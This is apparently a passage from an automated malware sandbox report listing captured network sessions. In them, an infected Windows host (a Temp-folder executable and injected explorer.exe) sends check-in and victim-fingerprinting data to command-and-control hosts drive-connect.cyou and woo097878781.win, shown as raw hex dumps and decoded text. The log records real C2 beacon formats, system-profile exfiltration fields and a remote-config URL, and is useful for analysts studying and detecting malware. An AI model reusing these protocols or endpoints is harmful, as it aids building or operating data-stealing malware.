                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: 3c b5 b4 e3 b4 a3 c9 3f ac 8e 67 46 66 b3 69 8a a3 74 72 70 f9 c8 00 f5 b1 e2 38 7b e8 73 c1 20 95 36 30 2f ab 6e be b9 bc 62 f1 37 ae 40 b2 da cf fb dd b6 7a ab ec bd e4 b5 ca 3c 25 52 59 ee dc cc 23 ec b5 be a9 98 19 99 d9 1a 7c 57 de 3c 66 9d f3 cb 6e 31 87 d8 35 e0 fb ed 63 60 da 35 4c df 66 67 e1 58 ca f2 c7 3a c7 c1 3d 81 b9 57 96 db 7e ef d7 cc 23 30 ed 93 6e 21 b9 15 fb c4 0d 8f bd 7e 73 c3 f2 40 f6 a9 a9 e1 df c6 8e 36 cc 71 fb 4f de 15 7c 39 06 72 48 51 4c bf e3 32 11 79 89 11 94 3c bf bf dc da 5f 68 7e 76 36 24 6a 64 3c 67 15 e4 59 17 3d c4 ad cb 28 e5 00 c6 7e 34 dd 7b e8 d6 fb c7 a0 2a 1f 13 3a 22 00 a6 29 45 5d 65 42 a0 bb f0 c2 ec 78 d6 95 e9 d1 6e bd 73 77 7e 64 9d 8d 13 07 b1 c6 08 08 46 94 d8 a3 bd 20 5b be fc 13 1a f4 d8 ae 3a 5f 7a 74
                                                                                                                                                                                              Data Ascii: <?gFfitrp8{s 60/nb7@z<%RY#|W<fn15c`5LfgX:=W~#0n!~s@6qO|9rHQL2y<_h~v6$jd<gY=(~4{*:")E]eBxnsw~dF [:_zt
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: e8 fa 47 de 49 ed d7 75 31 d3 be 13 e5 95 32 0f 1f be a5 d4 bd 54 b0 d2 f9 20 f2 38 04 62 f8 d4 d5 a8 2f 58 43 82 da 21 ac 86 76 63 a7 5c 38 4f 11 b6 11 17 5c cb e2 26 39 7c 38 37 e1 b7 2d 2b 7d f4 aa 4e 77 bc 19 c4 b9 77 76 a4 cc dd 78 15 85 0e 97 11 c1 b9 d9 15 a9 65 a9 38 9e b9 d6 1d f7 95 c0 a0 81 f6 0f d2 75 46 3f 4f 87 d6 38 41 b5 78 a0 7a 2e d7 33 4f d8 b4 a2 01 80 bc cd 55 c9 81 a2 ed d5 e3 70 e0 b7 5c a3 a1 63 52 33 d7 2f 91 df ea 86 fa cc 09 00 9c fc c6 a9 ea e1 54 e7 33 0c 59 dd 1c 92 2f 36 ea 38 f9 64 91 7a 40 83 3d c4 f1 ff 62 2b ad a3 1a 41 bd ee 99 47 52 c0 48 90 4c 5a f9 5b d0 11 ff 6d 3f 39 bb 1c d6 98 e4 49 0c 38 d4 5a df 3e 5b db 98 bc 52 e5 3a cb 6a 34 c0 bf 11 93 32 d9 cf 7b 76 3c 95 2b d2 9e d4 5e c2 75 14 35 70 7f db e8 60 42 9e ec
                                                                                                                                                                                              Data Ascii: GIu12T 8b/XC!vc\8O\&9|87-+}Nwwvxe8uF?O8Axz.3OUp\cR3/T3Y/68dz@=b+AGRHLZ[m?9I8Z>[R:j42{v<+^u5p`B
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: a8 2a fc c4 88 fe 60 01 d7 b1 13 71 e7 bb 37 37 83 2f 81 40 18 96 00 b7 fa 35 ba 96 64 90 68 59 7a f6 ad b7 50 1b c6 87 77 ce ed df e7 ea a4 c1 f1 58 fa ae cc a6 d4 c6 75 03 ab 23 7b 08 3e e8 25 07 e7 2a 99 8e 8b 19 0e 38 10 f5 c0 08 f9 1a 37 8c 59 8f f4 b8 27 f9 eb 8b bc 58 86 16 f7 ba 4e 24 5c 67 2b 8e af df ac c1 12 14 fa 61 2f 89 eb 4a 25 9f e7 48 c9 5c 99 c0 6a 7c 4b b8 f3 7d a0 e5 f8 b2 f0 d8 77 01 dc 65 70 52 58 64 ec 4b d0 cf b3 2e e3 98 a5 80 bf 49 f6 99 69 92 b0 7a ee b7 e7 39 46 91 c1 69 bf 85 e2 b8 b1 43 96 4a 29 65 1b 62 1b ba 89 cf 72 54 08 bb 17 0a 66 ab 78 17 7c f6 2a ae 83 49 cf 48 e5 84 f5 29 50 f8 f8 17 1e a8 1e e4 5e d4 82 ce 8f 2b 92 c8 ef b6 ad 6d 61 2d 61 c6 df c0 f3 b8 30 f9 64 7a f5 06 5f 5b e3 6e f0 86 39 ff f3 cf 7f db af 38 83
                                                                                                                                                                                              Data Ascii: *`q77/@5dhYzPwXu#{>%*87Y'XN$\g+a/J%H\j|K}wepRXdK.Iiz9FiCJ)ebrTfx|*IH)P^+ma-a0dz_[n98
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: 1d 20 b8 1e e0 30 b0 71 33 43 13 e0 99 0e 66 c2 6c ec a1 eb a0 a0 53 eb e9 7e 60 7b 45 39 b7 78 92 de bc d3 1e 4b 4b ba 93 4d 28 ac 38 64 e1 42 7f 1c 46 1f 10 f3 7e 8c 44 00 82 96 31 01 80 32 f2 92 69 94 6b 35 95 de 8b f2 96 8b 19 9c f4 0d 4a 36 aa 5b 99 43 66 b1 b5 3d 5f fa 8a 1f 0d a7 a3 39 e6 48 38 a2 4f b5 a1 28 d1 95 e8 a4 6e 83 f0 80 e7 12 8e ae 74 c2 fa 94 a0 20 c4 44 20 71 5e f1 03 98 1f 8f 61 a3 59 2d 8d c5 01 c9 b9 a3 e9 b5 34 4c 44 8f 50 41 31 19 1b 0f e2 a2 24 73 3e 6e aa 70 9d a9 13 69 14 6f 07 85 28 7d 74 d7 b1 82 2b ca a9 92 51 9e 2a a5 21 42 7f 4e e3 30 56 2c ae 88 e9 dc db 7e 5a 95 b8 c5 31 87 5c f3 a3 16 09 ce 7b 5f 85 90 85 61 61 07 60 00 cc 12 4b 85 c3 c3 34 98 8f 65 e8 81 04 dd 2f fd 34 22 59 25 ea 1c 5a 67 19 a0 45 07 93 dc 9d d5 e2
                                                                                                                                                                                              Data Ascii: 0q3CflS~`{E9xKKM(8dBF~D12ik5J6[Cf=_9H8O(nt D q^aY-4LDPA1$s>npio(}t+Q*!BN0V,~Z1\{_aa`K4e/4"Y%ZgE
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: df 23 b5 33 05 68 d7 40 29 f2 8f 16 ad 4a df ab 51 58 6d 07 c2 04 33 3c 2a 76 c5 76 dc 05 83 61 51 33 53 e3 f7 c3 31 74 02 54 fb 5c f4 5b 27 39 a2 4d 03 01 4a ba 5b 28 f6 58 54 fe a5 85 e3 55 3c 31 49 61 81 25 bb 17 6a a9 07 28 3e bf ec 9b a6 3d 7a a5 45 cf bd cf 0d e2 89 b2 9e ed 64 10 40 50 30 e9 12 53 7c 24 6e 50 44 93 39 76 d4 4f 04 85 c1 10 31 6c 39 e3 ef c1 7a b3 9d f6 5d f3 c8 1b bd 6d 06 80 7f fc 33 c5 2a 60 31 de 78 a0 dd b9 06 fd 6a b5 03 45 ce c2 e2 13 f3 45 dd 06 31 82 bd 39 96 e1 10 5a 39 68 eb c0 fe 4c 14 3c d3 7e 29 53 4a d3 14 df d1 af d8 9b ee 14 21 23 b4 47 15 c3 1a 9f 33 35 80 0e ef 39 de 9b 6b 80 fb 7a be ad 46 f3 b2 c7 d6 be a1 4b fe 09 23 5e 1f b4 26 b7 45 51 3b b7 eb bf 44 55 eb 42 4d fb 41 db 55 b7 f6 75 95 c4 f1 87 d1 46 1a bf 98
                                                                                                                                                                                              Data Ascii: #3h@)JQXm3<*vvaQ3S1tT\['9MJ[(XTU<1Ia%j(>=zEd@P0S|$nPD9vO1l9z]m3*`1xjEE19Z9hL<~)SJ!#G359kzFK#^&EQ;DUBMAUuF
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: 77 f0 22 37 c4 29 e4 99 2a 2b 33 df 5a 4a 0f a8 73 bf ba d8 28 62 4e 13 cd ce dc a1 d7 2f 1d 90 8c bc 5e a3 66 c9 ff 8b d8 6f 27 49 b6 66 d6 fe 3a d5 73 3c 08 54 c6 5d 46 71 5e 66 7b c7 85 a1 84 2f bb 30 58 ac ea e9 10 e2 3e 87 c4 08 d8 96 49 b6 ad 57 7d 52 b5 65 02 b0 d6 a6 73 0f 83 12 43 d8 29 27 fb f2 b8 49 c5 74 a5 39 d6 af 4e 32 cd 0f 7c ae 7d 62 03 d7 00 4e 07 57 fc bd 16 18 e4 5f 89 0f d8 6a a1 6b bc 3f 06 cb be df 1f bd 43 9f 00 13 5e 86 5d dc 7f 31 51 3f 13 cd 5b 98 eb b6 0e 0e 21 a8 c6 fa 98 14 c3 76 77 f0 2e a1 37 2d 8a 8f 2b ea 6c d4 51 b9 c0 af eb 76 05 24 d8 fa 2d 5f 56 e4 f2 9a 11 9d 98 a3 e5 2b 2c 51 e8 8d b1 11 f3 9d 6a 7e 25 e9 4b d5 e4 e8 29 69 7f 2b 69 bf f6 63 ce f4 ee b2 73 87 9d d9 45 76 6f 55 4c f1 c9 05 aa d4 65 f5 bf fd 58 0e 0c
                                                                                                                                                                                              Data Ascii: w"7)*+3ZJs(bN/^fo'If:s<T]Fq^f{/0X>IW}ResC)'It9N2|}bNW_jk?C^]1Q?[!vw.7-+lQv$-_V+,Qj~%K)i+icsEvoULeX
                                                                                                                                                                                              2024-12-16 00:02:16 UTC15331OUTData Raw: 17 73 8f 7e 5f 51 7a 52 fa ef 38 c6 df 83 1b ee 2c 85 e2 d3 18 e9 53 c2 88 55 ec e3 1b 9f 0f ef 4d d2 e5 fe 38 4b ce f6 d8 b7 b4 e2 1e a3 2a 5e 56 59 77 7b 30 50 57 89 f1 7b bf 51 d8 8f cf a7 47 fa 8f 68 8a b4 9d e6 dd 54 f3 7c db dd c0 ec 19 80 71 7f dd 09 2b ba 47 27 fa 8a 3c d9 32 d2 af 94 eb 9e 32 cb 24 28 58 6f d6 90 7b 7e d0 04 cd 10 f8 27 29 84 1c d3 fc 2a 0e d4 93 1f c1 67 52 c7 ae bc 2d 77 27 ba dd 9a 3b b2 01 ff 2a 26 d2 2b fc f9 b3 be 7d 91 3f 26 93 f2 c2 1f c4 d3 66 2e 80 ad 78 4c a3 63 1d 13 21 6e c1 e2 fc 69 95 9f ae fb 62 a7 14 9e 74 b6 6f b5 58 fa fb 9f 83 d7 bd 87 51 71 2f 9f 30 11 1b d1 8d 79 35 27 39 34 d0 a8 ce c4 a3 37 0a 6e 9f 82 c5 44 0d 76 36 be 07 62 90 c4 d4 66 2b 42 9d 76 dc 98 04 dc 16 cb e8 13 e5 e0 a0 75 65 4c b8 fb 19 f0 ec
                                                                                                                                                                                              Data Ascii: s~_QzR8,SUM8K*^VYw{0PW{QGhT|q+G'<22$(Xo{~')*gR-w';*&+}?&f.xLc!nibtoXQq/0y5'947nDv6bf+BvueL
                                                                                                                                                                                              2024-12-16 00:02:19 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:19 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=idk938s04dpcdplhn0ifjggh01; expires=Thu, 10-Apr-2025 17:48:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpmcBi1do97VpDqvqzN4xrOuC9npq8sZhfRXJQU5SOj2UPjlB%2BXHMUxBxH2xzfKVlSg2g31Bqyr0bLrxjdXKj08ZFg0MwffU3lnPJJ5sffcgXntV9R3ODa7LOOMaUzsBl70fqhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a675318555e66-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1574&rtt_var=704&sent=318&recv=577&lost=0&retrans=0&sent_bytes=2845&recv_bytes=554623&delivery_rate=1439132&cwnd=182&unsent_bytes=0&cid=651b7c5991987281&ts=3962&x=0"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              12192.168.2.449957104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 81
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:02:21 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=07817FAAC2C8E9D223D904AF30EFEBBC
                                                                                                                                                                                              2024-12-16 00:02:22 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:22 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=9suc8dm6h5stjiij4f00q2tgd6; expires=Thu, 10-Apr-2025 17:49:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNtFo2iAed0nQXn%2F42eayzSEgfUj40vmkNz2VXv1jhPWwANAxwUVwJbaV73DYBmFt3327oWKGZ88sztvyZP%2BsXGoqnx%2FJBKIwYv0u2KoF1bMWnIFoZNAzTiq07kC5XjlBPbD4l0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a6775ade415bb-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1550&rtt_var=1069&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=983&delivery_rate=833571&cwnd=113&unsent_bytes=0&cid=7a4e2002758fb66d&ts=894&x=0"
                                                                                                                                                                                              2024-12-16 00:02:22 UTC54INData Raw: 33 30 0d 0a 6c 32 74 42 74 76 52 44 39 61 4d 2b 6c 6b 68 36 30 5a 2b 67 31 6c 61 4e 56 61 7a 50 6f 75 59 31 64 77 6f 68 70 6f 42 63 2b 6b 44 4d 4e 67 3d 3d 0d 0a
                                                                                                                                                                                              Data Ascii: 30l2tBtvRD9aM+lkh60Z+g1laNVazPouY1dwohpoBc+kDMNg==
                                                                                                                                                                                              2024-12-16 00:02:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              13192.168.2.449979154.216.20.2434435676C:\Windows\explorer.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:02:33 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 537
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                                                                                              2024-12-16 00:02:33 UTC537OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 30 36 33 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 67 70 75 22 3a 22 31 59 45 32 4b 4f 47 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                                                                              Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                                                                              2024-12-16 00:02:33 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:33 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Powered-By: PHP/8.3.14
                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              2024-12-16 00:02:33 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 2{}0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              14192.168.2.450109154.216.20.2434435676C:\Windows\explorer.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:03:34 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 523
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                                                                                              2024-12-16 00:03:34 UTC523OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 30 36 33 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 67 70 75 22 3a 22 31 59 45 32 4b 4f 47 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                                                                              Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                                                                              2024-12-16 00:03:35 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:03:35 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Powered-By: PHP/8.3.14
                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              2024-12-16 00:03:35 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 2{}0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              15192.168.2.450155104.21.79.7443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:04:34 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:04:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                              2024-12-16 00:04:35 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:34 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=2isbn91ahve6n6nln007t7bmbl; expires=Thu, 10-Apr-2025 17:51:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xt%2BE%2BOfuvvgjvUJJXyuxRRjFSbKiOjyYcEpHIbo7lNfHFNOcxXIh1CHL9x7D8GQJ946CtSOe3QqPHG17nGyZdPcBR67ldR2yIx4gV71R2zy%2FMxacMnRQTZGiSbLYZ4aU%2FGGW99Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a6ab40ab7c477-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1672&rtt_var=640&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1691772&cwnd=181&unsent_bytes=0&cid=9147c2f1ac4b8be1&ts=1033&x=0"
                                                                                                                                                                                              2024-12-16 00:04:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                              2024-12-16 00:04:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              16192.168.2.450156154.216.20.243443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:04:35 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 537
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                                                                                              2024-12-16 00:04:35 UTC537OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 30 36 33 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 67 70 75 22 3a 22 31 59 45 32 4b 4f 47 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                                                                              Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                                                                              2024-12-16 00:04:36 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:36 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Powered-By: PHP/8.3.14
                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              2024-12-16 00:04:36 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 2{}0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              17192.168.2.450168104.21.79.7443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:04:45 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 46
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:04:45 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:46 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=hk7blsbceh4lbvf1adu64hh84r; expires=Thu, 10-Apr-2025 17:51:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
